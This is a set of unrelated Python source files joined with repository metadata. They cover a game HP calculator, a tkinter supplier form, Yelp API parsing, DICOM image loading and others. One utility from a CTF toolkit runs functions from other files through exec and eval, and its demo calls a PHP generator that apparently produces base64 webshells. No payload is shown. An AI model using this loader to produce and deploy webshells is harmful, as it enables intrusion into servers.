return list(filter(func, plist))
# 获取群内的群友名字
async def get_group_member_name(group_id, user_id):
qq_info = await bot.get_group_member_info(group_id=group_id, user_id=user_id)
return qq_info['card'] or qq_info['nickname']
bossData = {
'scoreRate': [
[1, 1, 1.3, 1.3, 1.5],
[1.4, 1.4, 1.8, 1.8, 2],
[2.0, 2.0, 2.5, 2.5, 3.0]
],
'hp': [6000000, 8000000, 10000000, 12000000, 20000000],
'max1': 4,
'max2': 11
}
def calc_hp(hp_base: int):
zm = 1
king = 1
cc = 0.0
remain = 0.0
damage = 0
remainHp = 0.0
remainPer = 0.0
while True:
if zm < bossData['max1']:
nowZm = 0
elif bossData['max1'] <= zm < bossData['max2']:
nowZm = 1
elif zm >= bossData['max2']:
nowZm = 2
#nowZm = bossData['max1'] - 1 if zm > bossData['max1'] else zm - 1
cc += bossData['scoreRate'][nowZm][king - 1] * bossData['hp'][king - 1]
if cc > hp_base:
cc -= bossData['scoreRate'][nowZm][king - 1] * bossData['hp'][king - 1]
remain = (hp_base - cc) / bossData['scoreRate'][nowZm][king - 1]
damage += remain
remainPer = 1.0 - remain / bossData['hp'][king - 1]
remainHp = bossData['hp'][king - 1] - remain
break
damage += bossData['hp'][king - 1]
if king == 5:
zm += 1
king = 1
continue
king += 1
remainPer *= 100
bdk = bossData['hp'][king - 1]
return f'{zm}周目{king}王 [{math.floor(remainHp)}/{bdk}] {round(remainPer, 2)}%' | sanshanya/hoshino_xcw | XCW/Hoshino/hoshino/modules/eclanrank/util.py | util.py | py | 3,692 | python | en | code | 231 | github-code | 13 |
27159994105 | import tkinter as tk
import json
from tkinter import messagebox
f1 = open("files/proveedorData.json", "r")
c = f1.read()
file = json.loads(c) #js
def formulario_proveedor(app):
codigoP = tk.StringVar()
cuilData = tk.StringVar()
razonSocialData = tk.StringVar()
domicilioData = tk.StringVar()
telefonoData = tk.StringVar()
# VALIDACIÓN DE DATOS
def validate(obj):
count = 0
if(obj["codigo"].isdigit()):
pass
else:
messagebox.showerror("Codigo Invalido", "Debes poner un valor numerico")
count += 1
if(obj["razonSocial"].isalpha()):
pass
else:
messagebox.showerror("Razon Social Invalida", "La razon social no debe contener numeros ni espacios")
count += 1
if(obj["telefono"].isdigit()):
pass
else:
messagebox.showerror("Telefono Invalido", "El telefono debe estar compuesto unicamente por numeros.")
count += 1
if(count > 0):
messagebox.showerror("ERROR", "Hay datos invalidos en el formulario.")
formulario_proveedor.destroy()
else:
f = open("files/proveedorData.json", "w")
file.append(obj)
newFile = json.dumps(file, indent=4, sort_keys=True)
f.write(newFile)
f.close()
formulario_proveedor.destroy()
# FUNCIÓN PARA OBTENER LA INFO. DE LOS CAMPOS Y ALMACENARLA EN EL ARCHIVO
def getInfoProveedor():
nwObjc = {}
nwObjc["codigo"] = codigoP.get()
nwObjc["cuil"] = cuilData.get()
nwObjc["razonSocial"] = razonSocialData.get()
nwObjc["domicilio"] = domicilioData.get()
nwObjc["telefono"] = telefonoData.get()
validate(nwObjc)
# FUNCIÓN PARA CREAR LA VENTANA
formulario_proveedor = tk.Toplevel(app, bg="#030618")
formulario_proveedor.geometry("500x400")
from ButtonClass.ButtonClass import ButtonClass
label_formulario_proveedor = tk.Label(formulario_proveedor, text="Información del Proveedor:", font=('Arial', 18), bg="#030618", fg="#fff")
label_formulario_proveedor.grid(row=0, column=0, columnspan=2, pady=10)
codigo_p = tk.Label(formulario_proveedor, text="Código: ", font=('Arial', 14), bg="#030618", fg="#fff")
codigo_p.grid(row=1, column=0, pady=10, padx=10)
cuil_p = tk.Label(formulario_proveedor, text="CUIL:", font=('Arial', 14), bg="#030618", fg="#fff")
cuil_p.grid(row=2, column=0, pady=10, padx=10)
razon_social = tk.Label(formulario_proveedor, text="Razón social:", font=('Arial', 14), bg="#030618", fg="#fff")
razon_social.grid(row=3, column=0, pady=10, padx=10)
domicilio = tk.Label(formulario_proveedor, text="Domicilio:", font=('Arial', 14), bg="#030618", fg="#fff")
domicilio.grid(row=4, column=0, pady=10, padx=10)
telefono = tk.Label(formulario_proveedor, text="Teléfono:", font=('Arial', 14), bg="#030618", fg="#fff")
telefono.grid(row=5, column=0, pady=10, padx=10)
entry_codigop = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=codigoP)
entry_codigop.grid(row=1, column=1)
entry_cuil = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=cuilData)
entry_cuil.grid(row=2, column=1)
entry_rs = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=razonSocialData)
entry_rs.grid(row=3, column=1)
entry_dom = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=domicilioData)
entry_dom.grid(row=4, column=1)
entry_tel = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=telefonoData)
entry_tel.grid(row=5, column=1)
boton_hecho = tk.Button(formulario_proveedor, image=ButtonClass.btnConfirmar, bg="#030618", command=getInfoProveedor, highlightthickness = 0, borderwidth=0, activebackground="#041E2D")
boton_hecho.grid(row=6, column=1, pady=10)
boton_volver = tk.Button(formulario_proveedor, image=ButtonClass.btnVolver, bg="#030618", command=formulario_proveedor.destroy, highlightthickness = 0, borderwidth=0, activebackground="#041E2D")
boton_volver.grid(row=6, column=0, pady=10)
| Christian-000/ParcialFinalAyED | forms/formProviders.py | formProviders.py | py | 4,192 | python | es | code | 0 | github-code | 13 |
36549522492 | #扫描py文件,根据匹配规则获取其中的函数以及调用方式
#2020.5.29-修复传参bug,精简代码,加入索引
#鸡贼的获取变量名的字符串https://www.zhihu.com/question/42768955#
# import re
# import traceback
# pattren = re.compile(r'[\W+\w+]*?get_variable_name\((\w+)\)')
# __get_variable_name__ = []
# def get_variable_name(x):
# global __get_variable_name__
# if not __get_variable_name__:
# __get_variable_name__ = pattren.findall(traceback.extract_stack(limit=2)[0][3])
# return __get_variable_name__.pop(0)
#鸡贼的获取变量名的字符串#
import os,sys
try:
from .matcher import Matcher
from .init_arg_checker import check_init_arg
except ImportError as ex:
path=os.path.abspath('.')
if 'tools' in path.replace('\\','/').split('/'):#这里是为了便于开发调试
path=path.split('tools',maxsplit=1)[0]+'Library/utils'
else:
path=path+'/Library/utils'
if not path in (p.replace('\\','/') for p in sys.path):
sys.path.append(path)
from matcher import Matcher
from init_arg_checker import check_init_arg
class pyfunc_scanner:
def __init__(self,file_path):
self._file_path=file_path
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
self._readfile()
def _check_file_path(self,_file_path):
if os.path.exists(_file_path) and os.path.isfile(_file_path):
return True
return False
def _readfile(self):
with open(self._file_path,'r',encoding='utf-8') as f:
self._file_data=f.read()
self._file_data_line=self._file_data.split('\n')
def _basic_match_scan(self,pattren,allow_space):
'''获取满足匹配的行号'''
R=[]
M=Matcher(substr=pattren,asterisk_match_len_blacklist=tuple())
for i,l in enumerate(self._file_data_line):
t=l
if allow_space:
t=l.strip()
#匹配
if M.is_match(t):
#加入结果(行号)
R.append(i)
return R
def _get_func_name(self,s):
'''从一行获取函数名'''
s=s.strip()
s=s.split(' ')
s=[i.strip() for i in s]
while '' in s:
s.remove('')
if 'def' in s:
s.remove('def')
s=''.join(s)
s=s.split('(')[0]
return s
def _get_func_args(self,s):
'''从一行获取函数参数'''
args=[i.strip() for i in s.split('(')[1].split(')')[0].strip().split(',')]
while '' in args:
args.remove('')
return tuple(a.split('=')[0] for a in args)
def _get_func_info(self,s0,s1,s2):
'''从当前一行和下一行获取注释'''
info=''
if '#' in s0:
info+=s0.split('#',maxsplit=1)[1]
if '#' in s1:
info+=s1.split('#',maxsplit=1)[1]
if '#' in s2:
info+=s2.split('#',maxsplit=1)[1]
if s2.count("'''")==2:
info+=s2.strip().replace("'''",'').strip()
if s2.strip().startswith('print(') and s2.strip().endswith(')'):
t=s2.strip()[6:-1]
if (t[0]=='"' or t[0]=="'") and (t[-1]=='"' or t[-1]=="'"):
t=t[1:-1]
info+=t
return info
def _ana_func(self,flist):
R=[]
for i in flist:
if i<=0:t0=''
else:t0=self._file_data_line[i-1]
t1=self._file_data_line[i]
if i+1>=len(self._file_data_line):t2=''
else:t2=self._file_data_line[i+1]
R.append((self._get_func_name(t1),self._get_func_args(t1),self._get_func_info(t0,t1,t2)))
return R
def scan_func(self,pattren,allow_space):
R=self._basic_match_scan(pattren,allow_space)
R=self._ana_func(R)
return R
class pyfunc_loader:
def __init__(self,file_path,func_list):
self._file_path=file_path
self._func_list=func_list
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
def _check_file_path(self,_file_path):
if os.path.exists(_file_path) and os.path.isfile(_file_path):
self._file_name=os.path.split(self._file_path)[1]
self._file_path=os.path.split(self._file_path)[0]
return True
return False
def _check_func_list(self,_func_list):
if not isinstance(_func_list,list):return False
for i in _func_list:
if not isinstance(i,tuple):return False
if len(i)!=3:return False
return True
def load(self):
if not self._file_path in sys.path:
sys.path.append(self._file_path)
R=[]
for f in self._func_list:
exec('from '+self._file_name[:-3]+' import '+f[0])
func=eval(f[0])
R.append((f[0],f[1],f[2],func))
return R
class pyfunc_runner:
def __init__(self,func_list):
self._func_list=func_list
self._func_index={}#索引,避免每次都遍历list
if not check_init_arg(self):
raise Exception('[!]error:参数检测不通过')
self._build_func_index()
def _check_func_list(self,_func_list):
if not isinstance(_func_list,list):return False
for i in _func_list:
if not isinstance(i,tuple):return False
if len(i)!=4:return False
return True
def _build_func_index(self):
for index,func in enumerate(self._func_list):
self._func_index[func[0]]=index
def _find_func(self,funcname):
if funcname not in self._func_index:
raise Exception('无此函数')
return self._func_list[self._func_index[funcname]]
def _get_run_arg(self,funcname,kargs):
func=self._find_func(funcname)
args={}
for a in func[1]:
if a in kargs.keys():
args[a]=kargs[a]
if len(args)!=len(func[1]):
return (False,args)
else:return (True,args)
def _completion_input(self,funcname,args):
func=self._find_func(funcname)
r=args.copy()
for k in func[1]:
if k not in args.keys():
#需要输入
c=input('输入缺少的参数->'+k+':')
if c.isdigit():
r[k]=int(c)
else:
r[k]=c
return r
def run(self,funcname,completion_input=True,**kargs):
r=self._get_run_arg(funcname,kargs)
if r[0]==True:
r=r[1]
elif completion_input:
r=self._completion_input(funcname,r[1])
else:
raise Exception('参数不匹配'+tuple(r[1])+'!='+kargs.keys())
#运行
func=self._find_func(funcname)
return eval("func[3](**r)")
class pyfunc_util:
def __init__(self,file_path,pattren,tolerant=False):
'''tolerant标记是否允许前后的空格'''
self._S=pyfunc_scanner(file_path)
self._Funcs3=self._S.scan_func(pattren,tolerant)
self._L=pyfunc_loader(file_path,self._Funcs3)
self._Funcs4=self._L.load()
self._R=pyfunc_runner(self._Funcs4)
def run(self,funcname,completion_input=True,**kargs):
return self._R.run(funcname,completion_input,**kargs)
def get_func(self,funcname):
try:
return self._R._find_func(funcname)
except Exception as ex:
pass
def get_funclist(self):
return self._Funcs3
if __name__ == "__main__":
#S=pyfunc_scanner('D:\\ctf-tool\\Library\\createaword\\jspcreater.py')
#S.scan_func('def jsp_*(*)*:',False)
p='G:\\python\\tool_manager\\Library\\createaword\\phpcreater.py'
# S=pyfunc_scanner(p)
# s=S.scan_func('def php_*(*)*:',False)
# L=pyfunc_loader(p,s)
# F=L.load()
# #for f in F:
# # print(f)
# R=pyfunc_runner(p,F)
# print(R.run('php_guogou',pwd='c'))
p=pyfunc_util(p,'def php_*(*)*:')
print(p.run('php_muti_base64',pwd='cccccccc',num=4))
| ezeeo/ctf-tools | Library/utils/get_func_from_pyfile.py | get_func_from_pyfile.py | py | 8,168 | python | en | code | 8 | github-code | 13 |
27949826519 | denom = 0
length = 0
for i in range(1,1000):
remainder = []
value = 1
position = 0
while value not in remainder:
position += 1
remainder.append(value)
value %= i
value *= 10
if position > length:
length = position
denom = i
print(denom)
| ha36ad/Math | Project_Euler/reciprocal_cycles.py | reciprocal_cycles.py | py | 346 | python | en | code | 0 | github-code | 13 |
12089155933 | # 名片模型模块
class CardModel:
def __init__(self, name='', com_name='', phone=0, job='', id=0):
self.id = id # ID
self.name = name # 姓名
self.com_name = com_name # 公司名
self.phone = phone # 电话
self.job = job # 职位
@property
def phone(self): # 电话读取方法
return self.__phone
@phone.setter
def phone(self, value): # 电话写入方法
if len(str(value)) in (7, 8, 11):
self.__phone = value
else:
raise Exception('电话错误')
| 15149295552/Code | Month01/Day17/TestWork/code10/cardModel.py | cardModel.py | py | 576 | python | zh | code | 1 | github-code | 13 |
42332761559 | import yelp_api_galleries
import yelp_api_wineries
def yelp_api_calls(latitude, longitude):
api_call_galleries = yelp_api_galleries.main(latitude, longitude)
api_call_wineries = yelp_api_wineries.main(latitude, longitude)
all_wineries = api_call_wineries[0].get("businesses")
my_business_dictionary = {}
for gallery in api_call_galleries:
all_business = gallery.get("businesses")
for business in all_business:
name = business.get("name")
_loc = business.get("location")
address = _loc.get("address")
city = _loc.get("city")
state = _loc.get("state_code")
zip_code = _loc.get("postal_code")
neighborhoods = _loc.get("neighborhoods")
cross_streets = _loc.get("cross_streets")
phone = business.get("display_phone")
url = business.get("url")
if (_loc.get("coordinate")) == None:
continue
else:
latitude = (_loc.get("coordinate").get("latitude"))
longitude = (_loc.get("coordinate").get("longitude"))
categories = business.get("categories")
my_business_dictionary[name] = {
"address" : address,
"city": city,
"state": state,
"zip_code": zip_code,
"neighborhoods": neighborhoods,
"cross_streets": cross_streets,
"phone": phone,
"url": url,
"latitude": latitude,
"longitude": longitude,
"categories": categories,
}
for winery in all_wineries:
name = winery.get("name")
_loc = winery.get("location")
address = _loc.get("address")
city = _loc.get("city")
state = _loc.get("state_code")
zip_code = _loc.get("postal_code")
neighborhoods = _loc.get("neighborhoods")
cross_streets = _loc.get("cross_streets")
phone = winery.get("display_phone")
url = winery.get("url")
latitude = _loc.get("coordinate").get("latitude")
longitude = _loc.get("coordinate").get("longitude")
categories = winery.get("categories")
my_business_dictionary[name] = {
"address" : address,
"city": city,
"state": state,
"zip_code": zip_code,
"neighborhoods": neighborhoods,
"cross_streets": cross_streets,
"phone": phone,
"url": url,
"latitude": latitude,
"longitude": longitude,
"categories": categories
}
return my_business_dictionary
"""
NOTES:
keys with in each business dictionary
[u'is_claimed', u'distance', u'mobile_url', u'rating_img_url', u'review_count', u'name', u'rating', u'url', u'categories', u'is_closed', u'phone', u'snippet_text', u'image_url', u'location', u'display_phone', u'rating_img_url_large', u'id', u'snippet_image_url', u'rating_img_url_small'] """
#business = data_list[0].get("businesses")[0].get("location")
#name_business = data_list[0].get("businesses")[0].get("name")
"""location dictionary
{u'cross_streets': u'Jefferson St & Clay St', u'city': u'Oakland', u'display_address': [u'560 2nd St', u'Jack London Square', u'Oakland, CA 94607'], u'geo_accuracy': 9.5, u'neighborhoods': [u'Jack London Square'], u'postal_code': u'94607', u'country_code': u'US', u'address': [u'560 2nd St'], u'coordinate': {u'latitude': 37.7971005, u'longitude': -122.278887}, u'state_code': u'CA'}
latitude = data_list[0].get("businesses")[0].get("location").get("coordinate").get("latitude")
""" | jabrad0/Getgo | combine_galleries_wineries.py | combine_galleries_wineries.py | py | 3,690 | python | en | code | 17 | github-code | 13 |
36262459142 | def find_dicom_series(paths, search_directories = True, search_subdirectories = True,
log = None, verbose = False):
dfiles = files_by_directory(paths, search_directories = search_directories,
search_subdirectories = search_subdirectories)
nseries = len(dfiles)
nfiles = sum(len(dpaths) for dpaths in dfiles.values())
nsfiles = 0
series = []
for dpaths in dfiles.values():
nsfiles += len(dpaths)
log.status('Reading DICOM series %d of %d files in %d series' % (nsfiles, nfiles, nseries))
series.extend(dicom_file_series(dpaths, log = log, verbose = verbose))
# Include patient id in model name only if multiple patients found
pids = set(s.attributes['PatientID'] for s in series if 'PatientID' in s.attributes)
use_patient_id_in_name = unique_prefix_length(pids) if len(pids) > 1 else 0
for s in series:
s.use_patient_id_in_name = use_patient_id_in_name
series.sort(key = lambda s: s.sort_key)
find_reference_series(series)
return series
# -----------------------------------------------------------------------------
# Group dicom files into series.
#
def dicom_file_series(paths, log = None, verbose = False):
series = {}
from pydicom import dcmread
for path in paths:
d = dcmread(path)
if hasattr(d, 'SeriesInstanceUID'):
series_id = d.SeriesInstanceUID
if series_id in series:
s = series[series_id]
else:
series[series_id] = s = Series(log = log)
s.add(path, d)
series = tuple(series.values())
for s in series:
s.order_slices()
if verbose and log:
for s in series:
path = s.paths[0]
d = dcmread(path)
log.info('Data set: %s\n%s\n%s\n' % (path, d.file_meta, d))
return series
# -----------------------------------------------------------------------------
# Set of dicom files (.dcm suffix) that have the same series unique identifer (UID).
#
class Series:
#
# Code assumes each file for the same SeriesInstanceUID will have the same
# value for these parameters. So they are only read for the first file.
# Not sure if this is a valid assumption.
#
dicom_attributes = ['BitsAllocated', 'BodyPartExamined', 'Columns', 'Modality',
'NumberOfTemporalPositions',
'PatientID', 'PhotometricInterpretation',
'PixelPaddingValue', 'PixelRepresentation', 'PixelSpacing',
'RescaleIntercept', 'RescaleSlope', 'Rows',
'SamplesPerPixel', 'SeriesDescription', 'SeriesInstanceUID', 'SeriesNumber',
'SOPClassUID', 'StudyDate']
def __init__(self, log = None):
self.paths = []
self.attributes = {}
self.transfer_syntax = None
self._file_info = []
self._multiframe = None
self._reverse_frames = False
self._num_times = None
self._z_spacing = None
self.use_patient_id_in_name = 0
self._log = log
def add(self, path, data):
# Read attributes that should be the same for all planes.
if len(self.paths) == 0:
attrs = self.attributes
for attr in self.dicom_attributes:
if hasattr(data, attr):
attrs[attr] = getattr(data, attr)
self.paths.append(path)
# Read attributes used for ordering the images.
self._file_info.append(SeriesFile(path, data))
# Get image encoding format
if self.transfer_syntax is None and hasattr(data.file_meta, 'TransferSyntaxUID'):
self.transfer_syntax = data.file_meta.TransferSyntaxUID
@property
def name(self):
attrs = self.attributes
fields = []
# if self.use_patient_id_in_name and 'PatientID' in attrs:
# n = self.use_patient_id_in_name
# fields.append(attrs['PatientID'][:n])
desc = attrs.get('SeriesDescription')
if desc:
fields.append(desc)
else:
if 'BodyPartExamined' in attrs:
fields.append(attrs['BodyPartExamined'])
if 'Modality' in attrs:
fields.append(attrs['Modality'])
if 'SeriesNumber' in attrs:
fields.append(str(attrs['SeriesNumber']))
# if 'StudyDate' in attrs:
# fields.append(attrs['StudyDate'])
if len(fields) == 0:
fields.append('unknown')
name = ' '.join(fields)
return name
@property
def sort_key(self):
attrs = self.attributes
return (attrs.get('PatientID',''), attrs.get('StudyDate',''), self.name, self.paths[0])
@property
def plane_uids(self):
return tuple(fi._instance_uid for fi in self._file_info)
@property
def ref_plane_uids(self):
fis = self._file_info
if len(fis) == 1 and hasattr(fis[0], '_ref_instance_uids'):
uids = fis[0]._ref_instance_uids
if uids is not None:
return tuple(uids)
return None
@property
def num_times(self):
if self._num_times is None:
nt = int(self.attributes.get('NumberOfTemporalPositions', 1))
else:
nt = self._num_times
return nt
@property
def multiframe(self):
mf = self._multiframe
if mf is None:
mf = False
for fi in self._file_info:
if fi.multiframe:
self._multiframe = mf = True
break
self._multiframe = mf
return mf
def order_slices(self):
paths = self.paths
if len(paths) == 1 and self.multiframe:
# Determination of whether frames reversed done in z_plane_spacing()
self.z_plane_spacing()
if len(paths) <= 1:
return
# Check that time series images all have time value, and all times are found
self._validate_time_series()
files = self._file_info
self._sort_by_z_position(files)
self.paths = tuple(fi.path for fi in files)
def _validate_time_series(self):
if self.num_times == 1:
return
files = self._file_info
for fi in files:
if fi._time is None:
raise ValueError('Missing dicom TemporalPositionIdentifier for image %s' % fi.path)
tset = set(fi._time for fi in files)
if len(tset) != self.num_times:
if self._log:
msg = ('DICOM series header says it has %d times but %d found, %s... %d files.'
% (self.num_times, len(tset), files[0].path, len(files)))
self._log.warning(msg)
self._num_times = len(tset)
tcount = {t:0 for t in tset}
for fi in files:
tcount[fi._time] += 1
nz = len(files) / self.num_times
for t,c in tcount.items():
if c != nz:
raise ValueError('DICOM time series time %d has %d images, expected %d'
% (t, c, nz))
def grid_size(self):
attrs = self.attributes
xsize, ysize = attrs['Columns'], attrs['Rows']
files = self._file_info
if self.multiframe:
if len(files) == 1:
zsize = self._file_info[0]._num_frames
else:
maxf = max(fi._num_frames for fi in files)
raise ValueError('DICOM multiple paths (%d), with multiple frames (%d) not supported, %s'
% (npaths, maxf, files[0].path))
else:
zsize = len(files) // self.num_times
return (xsize, ysize, zsize)
def origin(self):
files = self._file_info
if len(files) == 0:
return None
pos = files[0]._position
if pos is None:
return None
if self.multiframe and self._reverse_frames:
zoffset = files[0]._num_frames * -self.z_plane_spacing()
zaxis = self.plane_normal()
pos = tuple(a+zoffset*b for a,b in zip(pos, zaxis))
return pos
def rotation(self):
(x0,y0,z0),(x1,y1,z1),(x2,y2,z2) = self._patient_axes()
return ((x0,x1,x2),(y0,y1,y2),(z0,z1,z2))
def _patient_axes(self):
files = self._file_info
if files:
# TODO: Different files can have different orientations.
# For example, study 02ef8f31ea86a45cfce6eb297c274598/series-000004.
# These should probably be separated into different series.
orient = files[0]._orientation
if orient is not None:
x_axis, y_axis = orient[0:3], orient[3:6]
from chimerax.geometry import cross_product
z_axis = cross_product(x_axis, y_axis)
return (x_axis, y_axis, z_axis)
return ((1,0,0),(0,1,0),(0,0,1))
def plane_normal(self):
return self._patient_axes()[2]
def _sort_by_z_position(self, series_files):
z_axis = self.plane_normal()
from chimerax.geometry import inner_product
series_files.sort(key = lambda sf: (sf._time, inner_product(sf._position, z_axis)))
def pixel_spacing(self):
pspacing = self.attributes.get('PixelSpacing')
if pspacing is None and self.multiframe:
pspacing = self._file_info[0]._pixel_spacing
if pspacing is None:
xs = ys = 1
if self._log:
self._log.warning('Missing PixelSpacing, using value 1, %s' % self.paths[0])
else:
xs, ys = [float(s) for s in pspacing]
zs = self.z_plane_spacing()
if zs is None:
nz = self.grid_size()[2]
if nz > 1 and self._log:
self._log.warning('Cannot determine z spacing, missing ImagePositionPatient, using value 1, %s'
% self.paths[0])
zs = 1 # Single plane image
elif zs == 0:
if self._log:
self._log.warning('Error. Image planes are at same z-position. Setting spacing to 1.')
zs = 1
return (xs,ys,zs)
def z_plane_spacing(self):
dz = self._z_spacing
if dz is None:
files = self._file_info
if self.multiframe:
f = files[0]
fpos = f._frame_positions
if fpos is None:
gfov = f._grid_frame_offset_vector
if gfov is None:
dz = None
else:
dz = self._spacing(gfov)
else:
# TODO: Need to reverse order if z decrease as frame number increases
z_axis = self.plane_normal()
from chimerax.geometry import inner_product
z = [inner_product(fp, z_axis) for fp in fpos]
dz = self._spacing(z)
if dz is not None and dz < 0:
self._reverse_frames = True
dz = abs(dz)
elif len(files) < 2:
dz = None
else:
nz = self.grid_size()[2] # For time series just look at first time point.
z_axis = self.plane_normal()
from chimerax.geometry import inner_product
z = [inner_product(f._position, z_axis) for f in files[:nz]]
dz = self._spacing(z)
self._z_spacing = dz
return dz
def _spacing(self, z):
spacings = [(z1-z0) for z0,z1 in zip(z[:-1],z[1:])]
dzmin, dzmax = min(spacings), max(spacings)
tolerance = 1e-3 * max(abs(dzmax), abs(dzmin))
if dzmax-dzmin > tolerance:
if self._log:
from os.path import basename, dirname
msg = ('Plane z spacings are unequal, min = %.6g, max = %.6g, using max.\n' % (dzmin, dzmax) +
'Perpendicular axis (%.3f, %.3f, %.3f)\n' % tuple(self.plane_normal()) +
'Directory %s\n' % dirname(self._file_info[0].path) +
'\n'.join(['%s %s' % (basename(f.path), f._position) for f in self._file_info]))
self._log.warning(msg)
dz = dzmax if abs(dzmax) > abs(dzmin) else dzmin
return dz
@property
def has_image_data(self):
attrs = self.attributes
for attr in ('BitsAllocated', 'PixelRepresentation'):
if attrs.get(attr) is None:
return False
return True
@property
def dicom_class(self):
cuid = self.attributes.get('SOPClassUID')
return 'unknown' if cuid is None else cuid.name
# -----------------------------------------------------------------------------
#
class SeriesFile:
def __init__(self, path, data):
self.path = path
pos = getattr(data, 'ImagePositionPatient', None)
self._position = tuple(float(p) for p in pos) if pos else None
orient = getattr(data, 'ImageOrientationPatient', None) # horz and vertical image axes
self._orientation = tuple(float(p) for p in orient) if orient else None
num = getattr(data, 'InstanceNumber', None)
self._num = int(num) if num else None
t = getattr(data, 'TemporalPositionIdentifier', None)
self._time = int(t) if t else None
nf = getattr(data, 'NumberOfFrames', None)
self._num_frames = int(nf) if nf is not None else None
gfov = getattr(data, 'GridFrameOffsetVector', None)
self._grid_frame_offset_vector = [float(o) for o in gfov] if gfov is not None else None
cuid = getattr(data, 'SOPClassUID', None)
self._class_uid = cuid
inst = getattr(data, 'SOPInstanceUID', None)
self._instance_uid = inst
ref = getattr(data, 'ReferencedSOPInstanceUID', None)
self._ref_instance_uid = ref
self._pixel_spacing = None
self._frame_positions = None
if nf is not None:
def floats(s):
return [float(x) for x in s]
self._pixel_spacing = self._sequence_elements(data,
(('SharedFunctionalGroupsSequence', 1),
('PixelMeasuresSequence', 1)),
'PixelSpacing', floats)
self._frame_positions = self._sequence_elements(data,
(('PerFrameFunctionalGroupsSequence', 'all'),
('PlanePositionSequence', 1)),
'ImagePositionPatient', floats)
self._ref_instance_uids = self._sequence_elements(data,
(('SharedFunctionalGroupsSequence', 1),
('DerivationImageSequence', 1),
('SourceImageSequence', 'all')),
'ReferencedSOPInstanceUID')
def __lt__(self, im):
if self._time == im._time:
# Use z position instead of image number to assure right-handed coordinates.
return self._position[2] < im._position[2]
else:
return self._time < im._time
@property
def multiframe(self):
nf = self._num_frames
return nf is not None and nf > 1
def _sequence_elements(self, data, seq_names, element_name, convert = None):
if len(seq_names) == 0:
value = getattr(data, element_name, None)
if value is not None and convert is not None:
value = convert(value)
return value
else:
name, count = seq_names[0]
seq = getattr(data, name, None)
if seq is None:
return None
if count == 'all':
values = [self._sequence_elements(e, seq_names[1:], element_name, convert)
for e in seq]
else:
values = self._sequence_elements(seq[0], seq_names[1:], element_name, convert)
return values
# -----------------------------------------------------------------------------
# Find all dicom files (suffix .dcm) in directories and subdirectories and
# group them by directory.
#
def files_by_directory(paths, search_directories = True, search_subdirectories = True,
suffix = '.dcm', _dfiles = None):
dfiles = {} if _dfiles is None else _dfiles
from os.path import isfile, isdir, dirname, join
from os import listdir
for p in paths:
if isfile(p) and p.endswith(suffix):
d = dirname(p)
if d in dfiles:
dfiles[d].add(p)
else:
dfiles[d] = set([p])
elif search_directories and isdir(p):
ppaths = [join(p,fname) for fname in listdir(p)]
files_by_directory(ppaths, search_directories=search_subdirectories,
search_subdirectories=search_subdirectories, _dfiles=dfiles)
return dfiles
# -----------------------------------------------------------------------------
#
class DicomData:
def __init__(self, series):
self.dicom_series = series
self.paths = tuple(series.paths)
npaths = len(series.paths)
self.name = series.name
attrs = series.attributes
rsi = float(attrs.get('RescaleIntercept', 0))
if rsi == int(rsi):
rsi = int(rsi)
self.rescale_intercept = rsi
self.rescale_slope = float(attrs.get('RescaleSlope', 1))
bits = attrs.get('BitsAllocated')
rep = attrs.get('PixelRepresentation')
self.value_type = numpy_value_type(bits, rep, self.rescale_slope, self.rescale_intercept)
ns = attrs.get('SamplesPerPixel')
if ns == 1:
mode = 'grayscale'
elif ns == 3:
mode = 'RGB'
else:
raise ValueError('Only 1 or 3 samples per pixel supported, got %d' % ns)
self.mode = mode
self.channel = 0
pi = attrs['PhotometricInterpretation']
if pi == 'MONOCHROME1':
pass # Bright to dark values.
if pi == 'MONOCHROME2':
pass # Dark to bright values.
ppv = attrs.get('PixelPaddingValue')
if ppv is not None:
self.pad_value = self.rescale_slope * ppv + self.rescale_intercept
else:
self.pad_value = None
self.files_are_3d = series.multiframe
self._reverse_planes = (series.multiframe and series._reverse_frames)
self.data_size = series.grid_size()
self.data_step = series.pixel_spacing()
self.data_origin = origin = series.origin()
if origin is None:
self.origin_specified = False
self.data_origin = (0,0,0)
else:
self.origin_specified = True
self.data_rotation = series.rotation()
# ---------------------------------------------------------------------------
# Reads a submatrix and returns 3D NumPy matrix with zyx index order.
#
def read_matrix(self, ijk_origin, ijk_size, ijk_step, time, channel, array, progress):
i0, j0, k0 = ijk_origin
isz, jsz, ksz = ijk_size
istep, jstep, kstep = ijk_step
dsize = self.data_size
if self.files_are_3d:
a = self.read_frames(time, channel)
array[:] = a[k0:k0+ksz:kstep,j0:j0+jsz:jstep,i0:i0+isz:istep]
else:
for k in range(k0, k0+ksz, kstep):
if progress:
progress.plane((k-k0)//kstep)
p = self.read_plane(k, time, channel, rescale = False)
array[(k-k0)//kstep,:,:] = p[j0:j0+jsz:jstep,i0:i0+isz:istep]
if self.rescale_slope != 1:
array *= self.rescale_slope
if self.rescale_intercept != 0:
array += self.rescale_intercept
return array
# ---------------------------------------------------------------------------
#
def read_plane(self, k, time = None, channel = None, rescale = True):
if self._reverse_planes:
klast = self.data_size[2]-1
k = klast-k
from pydicom import dcmread
if self.files_are_3d:
d = dcmread(self.paths[0])
data = d.pixel_array[k]
else:
p = k if time is None else (k + self.data_size[2]*time)
d = dcmread(self.paths[p])
data = d.pixel_array
if channel is not None:
data = data[:,:,channel]
a = data.astype(self.value_type) if data.dtype != self.value_type else data
if rescale:
if self.rescale_slope != 1:
a *= self.rescale_slope
if self.rescale_intercept != 0:
a += self.rescale_intercept
return a
# ---------------------------------------------------------------------------
#
def read_frames(self, time = None, channel = None):
import pydicom
d = pydicom.dcmread(self.paths[0])
data = d.pixel_array
if channel is not None:
data = data[:,:,:,channel]
return data
# -----------------------------------------------------------------------------
# PixelRepresentation 0 = unsigned, 1 = signed
#
def numpy_value_type(bits_allocated, pixel_representation, rescale_slope, rescale_intercept):
from numpy import int8, uint8, int16, uint16, float32
if (rescale_slope != 1 or
int(rescale_intercept) != rescale_intercept or
rescale_intercept < 0 and pixel_representation == 0): # unsigned with negative offset
return float32
types = {(1,0): uint8,
(1,1): int8,
(8,0): uint8,
(8,1): int8,
(16,0): uint16,
(16,1): int16}
if (bits_allocated, pixel_representation) in types:
return types[(bits_allocated, pixel_representation)]
